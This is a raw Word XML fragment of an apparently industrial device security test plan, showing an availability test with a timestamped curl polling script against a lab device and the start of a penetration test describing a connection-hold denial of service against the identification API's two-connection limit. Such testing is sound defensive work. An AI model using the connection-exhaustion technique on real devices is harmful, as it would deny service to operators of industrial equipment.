              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="259A33F7" w14:textId="08C8458C" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00C164C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164C3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ007-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="5641419F"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CD87172" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2684F895" w14:textId="1EC6A3C1" w:rsidR="0069129D" w:rsidRPr="006868A2" w:rsidRDefault="006F0D80"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-007 → CR 7.8 / (availability, FR 7) → Asset H, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="103B2D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7F5445" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FD096EF" w14:textId="2429F22C" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00A14100"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commentRangeStart w:id="10"/>
            <w:r w:rsidRPr="00A14100">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Inherent unavailability (design/reliability, not attack)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="10"/>
            <w:r w:rsidRPr="00105368">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="10"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w14:paraId="3830D482"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9546AC4" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4690B306" w14:textId="51250FE5" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00992025"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SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="21646B3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554536" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164CF51F" w14:textId="683A4926" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00E30465"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30465">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that identification data is not available "at all times" by continuously polling the identification endpoint while the device transitions through Init (power-cycle), Update (999 + install reboot), and FatalError, and by identifying the SCPU-flash window in which SCPU-sourced identifiers vanish.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="367AA38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4713B33" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F8EBCB" w14:textId="48129BF9" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="009B236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B2364">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1. Start a timestamped polling loop against a COM-sourced and an SCPU-sourced identifier. 2. Power-cycle (Init window). 3. Enter Update (999 + reboot; trigger /firmware/install reboot on a spare DUT). 4. Force FatalError. 5. Record every interval where the request fails or the SCPU-sourced value is absent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="389D3FB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E0A1FA" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B2BA2D" w14:textId="3665A4A3" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00C05066" w:rsidP="00C05066">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4578"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05066">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Gap-characterisation test. Expected: measurable outage windows during Init, install-reboot, and FatalError, and unavailability of SCPU-sourced identifiers during the SCPU flash → confirms G-1 and a FAIL against "at all times." A device returning valid identification continuously through all states would refute G-1 (investigate).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A13FFF" w14:textId="77777777" w:rsidR="0069129D" w:rsidRPr="00AF57B2" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C20D32E" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">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9129D" w14:paraId="391C45BE"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278BB" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60EE82C9" w14:textId="77777777" w:rsidR="0069129D"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9129D" w14:paraId="75E90CF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AC5302" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49F9240E" w14:textId="5221BE1A" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00452C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52CC6">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ007-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00F15AEA" w14:paraId="0DA2C68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8A4594C" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2402772D" w14:textId="0B61E9F8" w:rsidR="0069129D" w:rsidRPr="00F82AF0" w:rsidRDefault="00F82AF0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F82AF0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Spare DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="7287E94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A6DFF7" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EAE609" w14:textId="70385135" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00DD3D3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D3D38">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl polling loop with timestamps; power switch; rotary switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="71D7179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0CDB99" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E99D88C"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 TC-RQ007-02 Availability sampling across state transitions (design-inherent unavailability)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F153E9D" w14:textId="77777777" w:rsidR="003B1DB0" w:rsidRPr="006868A2"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LOG=TC0702_avail.csv; echo "ts,endpoint,http_code" &gt; $LOG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D0FD903" w14:textId="77777777" w:rsidR="003B1DB0" w:rsidRPr="006868A2"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>poll() { while true; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440528F9" w14:textId="77777777" w:rsidR="003B1DB0" w:rsidRPr="006868A2"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>for ep in deviceinfo/swrevision deviceinfo/swinfo/scpuversion; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1501ACFB" w14:textId="77777777" w:rsidR="003B1DB0" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>code=$(curl -s -o /dev/null -m 1 -w '%{http_code}' http://192.168.0.2/$ep)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C55C876" w14:textId="77777777" w:rsidR="003B1DB0" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>echo "$(date +%s.%N),$ep,$code" &gt;&gt; $LOG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F84850"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done; sleep 0.2; done; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFAD8D7"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poll &amp; # start sampling</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5D774B"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 --- operator actions, timestamped in a lab notebook ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B631CA"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 (1) power-cycle DUT -&gt; Init outage window</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A0FF68"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 (2) set rotary=999, reboot -&gt; Update state</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6572F745"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 (3) trigger /firmware/install -&gt; install reboot outage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0684FEA4"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 (4) induce FatalError (EC1) -&gt; safe-state window</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3729949F"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kill %1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F516D32" w14:textId="513776B2" w:rsidR="0069129D" w:rsidRPr="00105368"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 analyse: intervals where http_code != 200, and where scpuversion is empty/timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2A90C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B0E295" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F1492B" w14:textId="694D0020" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00DE12DD"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E12DD">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Outage rows (non-200/timeout) during Init, install-reboot, FatalError; scpuversion empty during SCPU flash (SRIO-15759, SRIO-2953); cross-reference EMC "not-supervised" concession (SRIO-11573/11572</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00AD4B09" w14:paraId="21524E13"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ED6C4D9" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604A66B0" w14:textId="2BCA1534" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00D85DE8"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Outage windows recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="56EB6B9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D89E419" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0091EF" w14:textId="0C3F6814" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00324C51"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324C51">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0702_avail.csv, annotated timeline, LED-state photos per transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="208B8408" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15347CDB" w14:textId="77777777" w:rsidR="00105368" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAC17DC" w14:textId="1F11FB6F" w:rsidR="0069129D" w:rsidRDefault="00DF084F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ007-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55DD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connection-Hold Self-DoS on the Identification API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA60EF" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="0069129D">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9129D" w14:paraId="7B45892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9581E6" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA51C90" w14:textId="77777777" w:rsidR="0069129D"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9129D" w14:paraId="1474783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AB1933" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF27B63" w14:textId="2FE2EBD7" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="0088100A"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8100A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ007-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2CE90E25"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3344AD1" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18270B4C" w14:textId="641757F0" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="00B7733D"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B7733D">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-007 → CR 7.1 / CR 7.2 → Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="2E84A48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D06960" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6749BC" w14:textId="1544F53A" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="0046126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commentRangeStart w:id="11"/>
            <w:r w:rsidRPr="00461264">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Self-inflicted DoS (resource-cap design flaw)</w:t>
            </w:r>
            <w:commentRangeEnd w:id="11"/>
            <w:r w:rsidRPr="00105368">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="11"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w14:paraId="57EB53CD"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1A903B2" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BFF9B08" w14:textId="2551BE21" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="0046126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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="00EE7A74" w14:paraId="224708E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FACDC4" w14:textId="77777777" w:rsidR="0069129D" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B4C06E" w14:textId="3F84085F" w:rsidR="0069129D" w:rsidRPr="00105368" w:rsidRDefault="002A197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1978">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the 2-connection limit (SRIO-7909), intended as DoS protection, is itself a DoS vector: two held connections exhaust the pool and block all further legitimate access to the identification API, defeating "at all times" without any bandwidth-based flooding (which is RQ-010).</w:t>
            </w:r>
          </w:p>
